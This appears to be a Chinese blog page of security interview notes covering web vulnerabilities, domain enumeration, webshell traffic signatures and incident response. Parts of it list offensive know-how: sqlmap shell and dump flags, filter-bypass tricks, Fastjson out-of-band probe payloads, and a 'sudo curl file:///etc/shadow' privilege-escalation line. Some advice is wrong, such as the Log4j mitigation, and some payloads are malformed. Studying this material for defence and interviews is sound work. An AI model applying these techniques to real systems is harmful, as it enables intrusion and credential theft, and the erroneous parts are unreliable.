HVV面试问题整理

这篇具有很好参考价值的文章主要介绍了HVV面试问题整理。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

        渗透测试流程

常见端口

Nmap

SQL注入

SQL注入原理

SQL注入修复建议

SQL注入漏洞挖掘

SQL注入绕过方式

sqlmap使用

文件上传漏洞

文件上传漏洞原理

文件上传漏洞修复建议

文件上传绕过方式

文件包含漏洞

文件包含漏洞原理

文件包含四个PHP相关函数

文件包含利用

文件包含修复建议

XSS(跨站脚本攻击)

XSS原理

XSS修复建议

!!!XSS与CSRF与SSRF漏洞区别

CSRF(跨站请求伪造)

CSRF原理

SSRF漏洞(服务端请求伪造)

SSRF漏洞原理

SSRF漏洞修复建议

XXE漏洞(XML文档外部实体注入)

XXE漏洞原理

XXE漏洞修复建议

XXE危害

XXE触发点

反序列化漏洞

反序列化漏洞原理

反序列化漏洞修复建议

Shiro反序列化漏洞

Fastjson反序列化漏洞

Log4j2 lookup 功能JNDI注入

中间件漏洞

解析漏洞

有反序列化漏洞的中间件Tomcat、Jboss、weblogic

Weblogic漏洞

        内网渗透

         提权

Windows提权方式

Linux提权

内网渗透工具

域信息收集

1、获取域SID

2、查询域内用户

3、查看域用户的详细信息

4、查询域列表(假如存在多个域)

5、查看域内主机信息

6、获取所在指定域下的主机名

7、查看域内计算机

8、查看域信任关系

9、查询域密码信息

10、查看域内时间(时间服务器)

11、查看域内用户组列表

12、查看存在的用户

13、域内控制器的查找方式

14、查看域管理员组

流量分析

wireshark使用

菜刀特征

蚁剑特征

冰蝎

Web攻击类的流量告警处置

发现一个SQL注入告警怎么判断?

应急

应急响应的六个过程?

中了病毒(或者挖矿病毒)、木马如何处置应急?

如果是Linux:

如果是Windows

/etc/passwd与/etc/shadow区别

入侵排查思路

Linux系统排查思路

Webshell查找


渗透测试流程

拿到授权且与客户沟通之后,拿到客户提供的资产或者目标域名;

信息收集主要使用nmap、御剑、fofa等工具,收集端口、同网段IP、子域名、相关服务、框架、使用的中间件等组件、各种版本信息、历史漏洞信息等相关信息,收集到信息后可以检索相关漏洞,再手动验证

漏洞扫描:根据收集到的信息使用漏扫等工具进行扫描爆破等自动化探测,按照扫描结果进行漏洞验证

手工漏洞挖掘:进行手工漏洞验证和手工漏洞的挖掘

先将收集到的框架漏洞、组件漏洞进行手工验证;

然后对主要功能点,比如登录页面、文件上传页面、信息查询页面、密码重置页面等,使用burpsuite等工具进行漏洞挖掘

提权:在客户许可后,对拿到shell权限的漏洞点进一步提权或者内网渗透

痕迹清除:清理渗透过程中留下的木马、账号等内容

报告书写根据检查出的漏洞及漏洞修复建议,写漏洞报告

漏洞复测在客户修复完成之后,进行漏洞复测,检查漏洞是否修复完成,完成闭环

常见端口

21 FTP

22 SSH

80   HTTP

443 HTTPS

445 ms17010漏洞利用端口

3389 远程桌面

3306 MySQL数据库

1433 SQLserver数据库

1521 orcle数据库

7001 weblogic中间件管理界面

8080 tomcat中间件管理界面

6379 redis数据库

Nmap

nmap hostname/ip或者多个ip或者子网192.168.123.*

-iL ip.txt 扫描ip.txt的所有ip

-A 包含了-sV,-O,探测操作系统信息和路由跟踪。一般不用,是激烈扫描

-O 探测操作系统信息

-sV 查找主机服务版本号

-sA 探测该主机是否使用了包过滤器或防火墙

-sS 半开扫描,一般不会记入日志,不过需要root权限。

-sT TCP connect()扫描,这种方式会在目标主机的日志中记录大批的链接请求以及错误信息。

-sP ping扫描,加上这个参数会使用ping扫描,只有主机存活,nmap才会继续扫描,一般最好不加,因为有的主机会禁止ping,却实际存在。

-sN TCP空扫描

-F 快速扫描

-Pn 扫描之前不使用ping,适用于防火墙禁止ping,比较有用。

-p 指定端口/端口范围

-oN 将报告写入文件

-v 详细信息

-T<0-5> 设定速度

HVV面试问题整理

 

SQL注入

SQL注入原理

未对客户端输入的内容校验,导致SQL语句传入数据库并执行,而产生的一个漏洞

SQL注入修复建议

加waf可以有效缓解,可以作为临时措施,根除的话需要修改源码,一般需要严格对输入参数进行SQL语句过滤,或者使用预编译(就是把要查询的语句先封装编译,后边输入的参数都会被作为字符串输入)

SQL注入漏洞挖掘

SQL注入漏洞一般出现在有数据交互的地方,比如登录页面、数据查询页面、新闻页面、数据新增页面等

SQL注入绕过方式

  1. 使用大小写混合
  2. 使用内联注释的方式绕过,就是用/*!12345 语句   */
  3. 使用等价替换的方式,比如用like替换等号
  4. 使用16进制编码表示字符串,绕过对库名的过滤

sqlmap使用

-U USER 用来进行枚举的数据库用户

-r 使用文件作为注入时提交的数据包内容(可以结合burpsuite抓的流量包使用)

--dbms 指定数据库或版本

–dbs 枚举数据库管理系统数据库

–tables 枚举数据库中的表

–columns 枚举数据表中的列名

-D 库名 要进行枚举的数据库名

-T 表名 要进行枚举的数据库表

-C 列名 要进行枚举的数据库列

--os-shell    写入webshell

--dump      拖库

--tamper 使用自动化绕过脚本

常见的自动化脚本

 base64encode.py 转为base64编码

 charencode.py 使用url编码

 chardoubleencode.py 双URL编码

 unmagicquotes.py 宽字节注入

 randomcomments.py 用/**/分割SQL关键字

文件上传漏洞

文件上传漏洞原理

因为对上传文件校验不够完善,而导致的可执行文件被上传到服务器,从而产生的漏洞。

文件上传漏洞修复建议

可以在服务端对文件后缀使用黑白名单结合的过滤方式,并且对文件内容进行校验,上传之后对文件名进行重命名操作,也可以使用微服务保存上传上来的文件。

文件上传绕过方式

1.黑名单

 a.通过一些特殊后缀 .php5 、.phtml、.asa、.jap等

 b.上传.htacess   点h t 额可赛思

 c.大小写pHp

 d.在数据包中 后文件缀名前加空格

 e.后缀名前加.

 f.加上::$DATA

 g.未循环验证,可以使用x.php..类似的方法

2.白名单(一般需要配合其他漏洞一起利用)

 a.%00截断

 b.图片马

 c.条件竞争

文件包含漏洞

文件包含漏洞原理

原理:文件包含本身是正常功能,如果客户端可以干预被包含的文件名,导致包含了恶意文件,就会产生漏洞

文件包含四个PHP相关函数

1.include():使用此函数,只有代码执行到此函数时才将文件包含进来,发生错误时只警告并继续执行。

2.inclue_once():功能和前者一样,区别在于当重复调用同一文件时,程序只调用一次。

3.require():使用此函数,只要程序执行,立即调用此函数包含文件,发生错误时,会输出错误信息并立即终止程序。

4.require_once():功能和前者一样,区别在于当重复调用同一文件时,程序只调用一次。

文件包含利用

 1.读取敏感文件   file://    伪协议

 2.远程包含shell

 3.图片上传并包含图片shell

 4.使用伪协议   php://input   可以读取post传参的数据,然后都当成PHP代码执行

 5.包含日志文件GetShell

 6.截断包含  绕过

文件包含修复建议

修复:

  1. 设置PHP参数allow_url_include=off   allow_url_fopen=off
  2. 对要包含的路径进行严格校验

XSS(跨站脚本攻击)

XSS原理

原理: 中文名是跨站脚本攻击通过在客户端和服务器的访问过程中插入恶意脚本(一般

我们使用js代码),实现对用户浏览器的攻击

XSS最大的特点就是能注入恶意的HTML/JavaScript代码到用户浏览的网页上,是因WEB应用程序对用户输入过滤不严格而产生的,当用户浏览这些网页时,就会执行其中的恶意代码。由于HTML代码和客户端JavaScript脚本能在受害者主机上的浏览器任意执行,这样等同于完全控制了WEB客户端的逻辑,在这个基础上,黑客可以轻易地发起Cookie窃取,会话劫持,钓鱼欺骗等各种各样的攻击。

XSS修复建议

  1. 对输入的内容进行过滤,比如过滤掉<> 参数
  2. 对将要输出的内容进行HTML编码
  3. 对重要的cookie设置httpOnly参数  防止客户端通过document.cookie读取 cookie

!!!XSS与CSRF与SSRF漏洞区别

XSS是跨站脚本攻击,攻击的目标是客户端,因为是脚本攻击,所以JS脚本写什么,客户端就会做什么,比如窃取cookie利用方式比较灵活

CSRF是跨站请求伪造,攻击的目标也是客户端,利用时只能窃用cookie,只能利用存在csrf漏洞的功能点,局限性比XSS大

SSRF是服务端请求伪造,攻击的是服务端,危害较大,可以造成内网穿透、命令执行、内网信息泄露

CSRF(跨站请求伪造)

CSRF原理

原理:中文名跨站请求伪造,在用户保持登录状态的情况下,攻击者构造一个站点,诱导用户访问,用户访问后被恶意站点控制跳转到存在CSRF漏洞的页面,假如这个页面是密码修改页面,在这个过程中,保持登录状态的cookie就会被窃用,造成密码修改。

CSRF漏洞修复建议

  1. 在重要的功能点上,增加访问来源的验证,比如验证referer头
  2. 增加验证码验证,增加token验证

SSRF漏洞(服务端请求伪造)

SSRF漏洞原理

原理:本身是资源的引用,如果没有进行校验,会导致内网不想让别人访问的资源或服务被人探测甚至攻击到的一个漏洞。

SSRF漏洞修复建议

修复:

1.地址做白名单处理

2.域名识别IP 过滤内部IP

3.校验返回的内容,对比一下是否与预期的内容一致

HVV面试问题整理

 

 

XXE漏洞(XML文档外部实体注入)

XXE漏洞原理

原理: 又叫XML外部实体注入,由于过滤不严格导致的,用户传入的恶意XML文档被解析导致的漏洞

XXE漏洞修复建议

修复建议:

  1. 对用户提交的XML数据进行过滤;
  2. 设置PHP参数,禁用外部实体写入

XXE危害

当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。

XXE触发点

xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件

反序列化漏洞

反序列化漏洞原理

原理:序列化是指Java对象转化为二进制文件的过程,反序列化指的是这个文件再转化为Java对象的过程,本身是个正常过程,但如果被转化的这个文件是个恶意的,转化后的对象也是会是恶意的,由此可造成命令执行等等威胁。

反序列化漏洞修复建议

一般我们遇到的反序列化漏洞,基本都是使用了具有反序列化漏洞的组件或者类造成的,一般我们打补丁或者升级到最新版本就可以防御。

Shiro反序列化漏洞

Shiro < 1.2.4版本会存在此漏洞,挖掘的时候删除请求包中的rememberMe参数,返回包中包含rememberMe=deleteMe字段。说明使用了shiro组件,可以尝试此漏洞。

如果返回包无此字段,可以通过在发送数据包的cookie中增加字段:****rememberMe=,然后查看返回数据包中是否存在关键字

此漏洞有两个版本利用方式,

SHIRO-550:

不需要提供秘钥,使用默认秘钥就可以利用

SHIRO-721反序列化漏洞

先爆破秘钥,成功后可以进一步利用

Fastjson反序列化漏洞

Fastjson提供了反序列化功能,允许用户在输入JSON串时通过“@type”键对应的value指定任意反序列化类名,由此造成反序列化漏洞;

漏洞挖掘方式:如果请求包中出现http头Accept:application/json,怀疑存在fastjson组件,构造报错,返回包中出现fastjson时,确认使用了fastjson组件,可以尝试此漏洞

Fastjson从1.2.24到1.2.67多个版本存在此漏洞,如果没有回显版本,可以将以下payload,挨个替换到请求内容,尝试是哪个版本的漏洞

{"@type":"java.net.InetSocketAddress"{"address":,"val":"aaa.dnslog.cn"}}

{"@type":"java.net.Inet4Address","val":"aaa.dnslog.cn"}

{"@type":"java.net.Inet6Address","val":"aaa.dnslog.cn"}

{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL", "val":"http://aaa.dnslog.cn"}}""}

Set[{"@type":"java.net.URL","val":"http://aaa.dnslog.cn"}]

Set[{"@type":"java.net.URL","val":"http://aaa.dnslog.cn"}

{{"@type":"java.net.URL","val":"http://aaa.dnslog.cn"}:0

Log4j2 lookup 功能JNDI注入

原理:本身是Apache日志功能,他有个日志遍历的功能,当碰到${jndi://  } ,会遍历执行,JNDI功能又可以使用ldap或者rmi来引入class文件,我们只需要在class文件中加入需要执行的恶意代码,就可以造成代码注入

流量特征就是${jndi://ldap://  } ${jndi://rmi://  }

防御的话,升级版本,lookup参数设为yes

中间件漏洞

解析漏洞

Apache文件名解析

从后往前解析,如果解析文件a.php.abc,先解析abc,Apache发现不认识,就会往前,解析PHP,最终文件会以PHP方式解析

IIS解析漏洞

1、目录解析:IIS从前往后解析,解析a.asp/a.jpg文件时,会先发现asp后缀,以为文件格式为asp,按照asp的方式解析

2、文件名解析:IIS从前往后解析,解析a.asp;.jpg文件时,会先发现asp后缀,以为文件格式为asp,按照asp的方式解析

Nginx 畸形文件名解析

解析文件a.jpg文件时,访问a.jpg/.php,查找文件内容时,.php不是完整文件名,因此从后往前找到a.jpg文件,确认文件类型时,nginx关注的是后缀,.php有完整的后缀,所以按照php去解析,因此a.jpg文件就会被解析成php

有反序列化漏洞的中间件Tomcat、Jboss、weblogic

Weblogic漏洞

发现端口7001则存在weblogic

未授权访问、反序列化、ssrf漏洞、T3协议反序列化等

内网渗透

提权

Windows提权方式

1、内核提权,利用WinSystemHelper跑一下,给出适合的内核漏洞编号,尝试就可以了

2、数据库提权,MySQL UDF提权,SQLserver使用xp_cmdshell提权

3、应用提权

4、中间人劫持等

Linux提权

  1. 内核漏洞提权
  2. SUID提权 文件设置SUID 权限,会允许用户执行此文件时,以属主的身份运行,如果此文件的属主为root,则以root身份执行
  3. sudo提权   sudo命令可以使任意用户使用root权限执行命令,此命令被滥用会造成提权
  4. 定时任务提权  利用crontab设置定时任务,会默认以root身份执行
  5. curl提权   sudo curl file:///etc/shadow  会访问存有所以用户密码哈希值的shadow文件,以此获取到高权限用户密码

内网渗透工具

mimikatz主要用做域渗透

域信息收集

域内基础信息收集

金票:黄金票据,伪造TGT,相当于获取域控权限

银票:白银票据,伪造ST,登录特定服务

1、获取域SID

whoami /all

image.png

域SID主要是用来区分不同域,域用户SID是用来区分域内不同的用户的,在后续票据传递中会使用到。

2、查询域内用户

net user /domain

image.png

通过查询域内用户就可以知道当前这个域内所有的用户名

3、查看域用户的详细信息

net user tom /domain

image.png

通过查看域用户的详细信息可以得到域用户密码的到期时间,所属组以及上次登录的时间等信息

4、查询域列表(假如存在多个域)

net view /domain

image.png

通过查询域列表可以看到,当前存在两个域分别是:C1AY,SUB

5、查看域内主机信息

net view

image.png

通过查询域内主机信息可以看到,当前域内存在着3台计算机。

6、获取所在指定域下的主机名

net view /domain:C1ay

image.png

通过查询指定域下的主机名也可以看到,当前域内存在着3台主机。

7、查看域内计算机

net group "domain computers" /domain

image.png

通过查看域内计算机可以看到,一共有2台计算机加入了当前域。

8、查看域信任关系

nltest /domain_trusts

image.png

通过查看域信任关系可以判断出当前域是否存在着林信任或是父子域信任,后续在跨域攻击或者是跨林攻击中会使用到。

9、查询域密码信息

net accounts /domain

image.png

通过查询域密码信息我们就可以知道当前域用户多久修改⼀次密码,密码策略的是什么,就可以针对性的制定⼀份密码字典,提高效率。

10、查看域内时间(时间服务器)

net time /domain

image.png

通过查看域内时间(时间服务器),我们得知了当前域的时间,我们就可以通过使用定时任务+IPC远程连接的方式来运行⼀些bat文件,后续会详细介绍,

11、查看域内用户组列表

net group /domain

image.png

Domain Admins:域管理员。

Domain Computers: 域内机器。

Domain Controllers:域控制器。

Domain Guest: 域访客,权限较低。

Domain Users: 域用户。

Enterprise Admins: 企业系统管理员用户。

在默认情况下,Domain Admins和Enterprise Admins对域内所有域控制器有完全控制权限。

通过查看域的用户组我们可以知道每个组具体是做什么的,比如说⼀些大型企业或者集团会有专门设有财务组、信息组、营销组...等等,那么假设我们要针对于某个部门、某个组、在具体到某个人来进行渗透,那么搜集组信息就尤为关键了。

12、查看存在的用户

dsquery user

image.png

常用的dsquery命令如下:image.png

13、域内控制器的查找方式

1、通过nltest命令查找域控制器

nltest /dclist:hacker

image.png

可以看到当前域内存在着两台域控制器,一台为主控制器,一台为辅域控制器。

2、通过查询域内时间

net time /domain

image.png

因为时间服务器一般为域控制器,我们也可以通过ping命令来获取到域控制器的IP地址:

image.png

3、查看域控制器组

net group "Domain Controllers" /domain

image.png

4、查询主域控制器

netdom query pdc

image.png

5、nslookup查询

nslookup DC1.c1ay.lab

image.png

14、查看域管理员组

net localgroup administrators /domain

流量分析

wireshark使用

wireshark简单的过滤规则

过滤 ip:

过滤源 ip 地址:ip.src==1.1.1.1;,目的 ip 地址:ip.dst==1.1.1.1;

过滤端口:

过滤 80 端口:tcp.port==80,源端口:tcp.srcport==80,目的端口:tcp.dstport==80

协议过滤:

直接输入协议名即可,如 http 协议 http

http 模式过滤:

过滤 get/post 包 http.request.mothod=="GET/POST"

菜刀、蚁剑、冰蝎流量特征

菜刀特征

使用了base64的方式加密了发送给“菜刀马”的指令,其中的两个关键payload z1和z2,这个名字是可变的,请求中会有eval这个函数

蚁剑特征

默认的USER-agent请求头 是 antsword xxx,但是 可以通过修改:/modules/request.js 文件中 请求UA绕过

其中流量最中明显的特征为@ini_set("display_errors","0");这段代码基本是所有WebShell客户端链接PHP类WebShell都有的一种代码

蚁剑混淆加密后还有一个比较明显的特征,即为参数名大多以“_0x......=”这种形式(下划线可替换),所以以_0x开头的参数名也很可能就是恶意流量

冰蝎

看包没有发现什么特征,但是可以发现它是POST请求的

1、Accept头有application/xhtml+xmlapplication/xmlapplication/signed-exchange属于弱特征(UA头的浏览器版本很老)

2、特征分析Content-Type: application/octet-stream 这是一个强特征查阅资料可知octet-stream的意思是,只能提交二进制,而且只能提交一个二进制,如果提交文件的话,只能提交一个文件,后台接收参数只能有一个,而且只能是流(或者字节数组);很少使用

#冰蝎2特征:

默认Accept字段的值很特殊,而且每个阶段都一样冰蝎内置了十余种UserAgent ,每次连接 shell 会随机选择一个进行使用。但都是比较老的,r容易被检测到,但是可以在burp中修改ua头。

Content-Length: 16, 16就是冰蝎2连接的特征

#冰蝎3特征:

冰蝎3取消动态密钥获取,目前很多waf等设备都做了冰蝎2的流量特征分析,所以3取消了动态密 钥获取;php抓包看包没有发现什么特征,但是可以发现它是POST请求的

1)Accept头application/xhtml+xmlapplication/xmlapplication/signed- exchange属于弱特征

2)ua头该特征属于弱特征。通过burp可以修改,冰蝎3.0内置的默认16个userAgent都比较老。现实生活中很少有人使用,所以这个也可以作为waf规则特征

jsp抓包特征分析Content-Type: application/octet-stream 这是一个强特征查阅资料可知 octet-stream的意思是,只能提交二进制,而且只能提交一个二进制,如果提交文件的话,只能提交 一个文件,后台接收参数只能有一个,而且只能是流(或者字节数组);很少使用。

Web攻击类的流量告警处置

要按照不同的漏洞及危害程度进行研判和处置,一般方法是:

先看是不是攻击,是的话,攻击先封禁IP及端口,抑制攻击继续

再看有没有成功,成功的话,确定造成的影响,进行恢复

如果是已经沦陷的流量告警,如webshell通信(之前一定有webshell上传)、源地址是内网的攻击(此主机可能已经被攻击拿下),需要进行溯源

发现一个SQL注入告警怎么判断?

天眼告警页面有一个详情,可以打开具体的流量包,先看请求头和请求体是否含有SQL注入常用的SQL语句,比如and 1=1 ,比如sleep,比如updatexml等,如果有的话,说明是攻击,然后看响应,响应状态码为404这种情况,就是没有利用成功,如果是响应码是200,就看响应体内容,看是否包含查询出的预期结果,如果含有预期结果,则攻击成功,处置的话,先申请封禁IP,然后向客户申请对相关服务下架处理,然后对漏洞进行修复,如果被爆出了账号,需要修改密码。

应急

应急响应的六个过程?

准备 - 检测 - 抑制 - 根除 - 恢复 - 跟踪总结

中了病毒(或者挖矿病毒)、木马如何处置应急?

得看是什么系统,大体步骤都是差不多的

如果是Linux:

先隔离设备,然后登录该主机

  1. 首先根据告警中的端口和域名排查出进程ID(PID),命令为netstat -ano

如果没有端口或者通信ip信息,可以用top命令,列出当前cup占用率较大的可疑进程

  1. 根据查出的端口号定位文件后根据PID杀死进程

定位文件  ls -l /proc/端口号 ,结果中/proc/端口号/exe 链接到进程的执行命令文件

杀死进程  kill -9 PID号

  1. 文件加密保存取证以后,删除文件,使用杀软扫描一下,看是否有残余文件
  2. 找个文件沙箱(比如奇安信的TI系统)跑一下提取到的病毒文件,看看会造成什么行为,根据行为进行修复
  3. 检查是否留有可疑用户、可疑文件、ssh登录证书等后门,检查定时任务
  4. 排查一下文件是如何被上传的,大概率是web漏洞或ssh爆破上传的
  5. 写应急检查报告

如果是Windows

1、首先根据告警中的端口和域名排查出进程ID(PID),命令为netstat -ano

如果没有端口或者通信ip信息,可以用任务管理器,列出当前cup占用率较大的可疑进程

2、定位文件后根据PID杀死进程

定位文件  在任务管理器的详细信息界面根据pid,右键打开文件位置

杀死进程  taskill /t /pid PID号

3、文件加密保存取证以后,删除文件,使用杀软扫描一下,看是否有残余文件

4、找个文件沙箱(比如奇安信的TI系统)跑一下提取到的病毒文件,看看会造成什么行为,根据行为进行修复

5、检查是否留有可疑用户、可疑文件、后门,检查注册表是否有残余,检查系统自启动

6、排查一下文件是如何被上传的

7、写应急检查报告

/etc/passwd与/etc/shadow区别

/etc/passwd 存账户信息一般不存密码 

/etc/shadow主要用来存密码

入侵排查思路

### 已经被入侵

一、目的已经达成,木马,后门均已销毁

1.既然知道被入侵,定位被入侵的时间点

2.如果这个服务器是云服务器,对其进行快照。(目的,封存内存。)

3.当定位到时间点,查设备流量信息。找到木马链接信息

4.查找系统内对应的日志,找到相关线索

5.如果日志被删除,因为机器快照已经建立。使用Winhex对硬盘数据进行恢复

二、目的没有达成,数据正在回传。木马,后门均在服务器上运行

1.下线服务器,封禁攻击IP

2.Volatility 内存取证 建立快照 提取内存定位到shellcode找到他的IP

3.如果他们使用常见的C2的工具,我们可以根据流量分析出入侵者的意图

4.关闭服务器,或者在防火墙上禁掉他们的IP。登录服务器,对shellcode进行移除

5.重启以后进入安全模式,排查注册表 计划任务 服务 放大镜后门 shift后门

正在被入侵

可能入侵者在尝试进行攻击的时候,下线,然后对机器进行排查

比如:弱口令爆破

1.弱口令爆破会产生日志,日志一定要采用远程日志系统,例如Linux的rsyslog。开启远程日志系统的好处:不怕日志被攻击者删除

2.一定要找到入侵者的源IP,在防火墙下发阻断策略

Linux系统排查思路

1、检查用户及密码文件/etc/passwd、/etc/shadow 是否存在多余帐号,主要看一下帐号

后面是否是 nologin,如果没有 nologin 就要注意;

2、通过 who 命令查看当前登录用户(tty 本地登陆 pts 远程登录)、w 命令查看系统

信息,想知道某一时刻用户的行为、uptime查看登陆多久、多少用户,负载;

3、修改/etc/profile的文件,在尾部添加相应显示时间、日期、ip、命令脚本代码,这样输入history命令就会详细显示攻击者 ip、时间历史命令等;

4、用 netstat -antlp|more命令分析可疑端口、IP、PID,查看下 pid 所对应的进程文件路径,运行ls -l /proc/$PID/exe 或 file /proc/$PID/exe($PID 为对应的pid 号);

5、使用ps命令,分析进程 ps aux | grep pid

6、使用 vi /etc/inittab 查看系统当前运行级别,通过运行级别找到/etc/rc.d/rc[0~6].d对应目录是否存在可疑文件;

7、看一下crontab定时任务是否存在可疑启用脚本;

8、使用chkconfig --list 查看是否存在可疑服务;

9、通过grep awk命令分析/var/log/secure安全日志里面是否存在攻击痕迹;

10、chkrootkit、rkhunter、Clamav 病毒后门查杀工具对 Linux 系统文件查杀;

11、如果有 Web 站点,可通过 D 盾、河马查杀工具进行查杀或者手工对代码按脚本木马关键字、关键涵数(evel、system、shell_ex

Webshell查找

Windows环境使用d盾

Linux环境使用河马Linux

Cookie和Session的区别

cookie存放在本机,session存放在服务器

Cookie和Session都是用于跟踪用户的身份验证和状态的机制,但Cookie是在客户端存储数据,而Session是在服务器端存储数据文章来源地址https://www.toymoban.com/news/detail-476731.html

到了这里,关于HVV面试问题整理的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 干货整理,Selenium 自动化测试常见异常问题 +解决方法(详细)

    异常1:Stale Element Reference Exception 直译异常 Stale Element Reference Exception:陈旧元素引用异常 首先,啥情况下会出现这异常 简单来说就是,页面元素过期了,无法引用元素 出现这异常的常见原因 The element has been deleted entirely:该元素已被删除【更常见】 The element is no longer attac

    2024年02月08日
    浏览(45)
  • 测试工程师常见的面试问题及回答建议

    说起软件测试近几年的发展,其实已悄无声息地发生了巨大的变化。前几年随着互联网行业的迅猛发展,软件测试人才稀缺,低门槛高薪资促使大批毕业生和转行人员一窝蜂地涌入。而现在,软件测试发展太快,纵观各大招聘网站,基础功能测试岗位需求逐渐减少,已基本饱

    2024年02月07日
    浏览(40)
  • 渗透安全及渗透测试流程教学

    网络安全的定义 什么是网络安全? 1、国际化标准组织(ISO)引用ISO-74982文献中对安全的定义:安全就是最大程度地减少数据和资源被攻击的可能性。 2、《计算机信息安全系统保护条例》中的第三条规范了包括计算机网络系统在内的计算机信息系统安全的概述:“计算机信

    2024年02月02日
    浏览(61)
  • 移动安全app渗透测试之渗透流程、方案及测试要点讲解

    被产品经理分到了个app测试的活,(话说为啥是产品经理给派活,我不是归技术总监管么),包含安卓端的和ios端的,有点懵逼, 说好的web渗透测试和服务器端渗透测试呢,虽然懵逼,不过凭借我强大的自学能力,有了下面这篇文章,工欲善其事,必先利其器。 先整理好思

    2024年02月16日
    浏览(37)
  • 常见前端面试题整理(带答案)

    (1)根据内容的语义化,选择合适的标签。便于开发人员阅读和写出更优雅的代码,也便于团队后期的开发和维护; (2)在没有CSS,或者CSS尚未加载的时候,页面也能够呈现出很好的内容结构、代码结构(如标题和正文分开); (3)有利于搜索引擎优化。搜索引擎依赖于

    2024年02月07日
    浏览(45)
  • WEB渗透测试流程

           首先学渗透成为网安的第一步是熟读《中华人民共和国网络安全法》和《中华人民共和国刑法》的相关法律法规。        什么是渗透测试,渗透测试并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评

    2024年02月04日
    浏览(34)
  • 渗透测试流程

    目录 前言: 渗透测试流程 1、先了解下渗透测试与入侵的最大区别 2、一般渗透测试流程 前言: 在软件开发中,渗透测试是一种非常重要的安全测试方法,它可以帮助我们更加全面地检测软件中的安全漏洞和风险。  渗透测试流程 1、先了解下渗透测试与入侵的最大区别 渗

    2024年02月15日
    浏览(33)
  • 渗透测试及流程

    渗透测试是一种安全测试,用于测试应用程序的不安全性。进行它以发现系统中可能存在的安全风险。 如果系统不安全,那么任何攻击者都可以破坏或获得对该系统的授权访问。安全风险通常是在开发和实施软件时发生的意外错误。例如,配置错误、设计错误和软件错误等。

    2024年02月13日
    浏览(37)
  • 密码暴力破解、渗透测试流程

    信息收集 1、扫描的价值 对攻击者来说:根据扫描结果,来决定进一步的攻击行动; 能够更有针对性地选择攻击方法、攻击工具,节省攻击时间 对防护者来说:根据扫描结果,判断应采取什么样的安全策略; 封堵漏洞、加固系统、完善访问控制 2、nmap Network Mapper,一款开源

    2024年02月08日
    浏览(48)
  • [渗透测试]—2.2 常见的攻击类型

    在本节中,我们将介绍一些常见的攻击类型,以帮助你更好地了解渗透测试的目标和方法。我们将涵盖以下攻击类型: SQL注入攻击 跨站脚本攻击(XSS) 跨站请求伪造(CSRF) 会话劫持 社会工程攻击 暴力破解 分布式拒绝服务攻击(DDoS) 零日攻击 SQL注入攻击是一种利用Web应

    2024年02月13日
    浏览(42)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包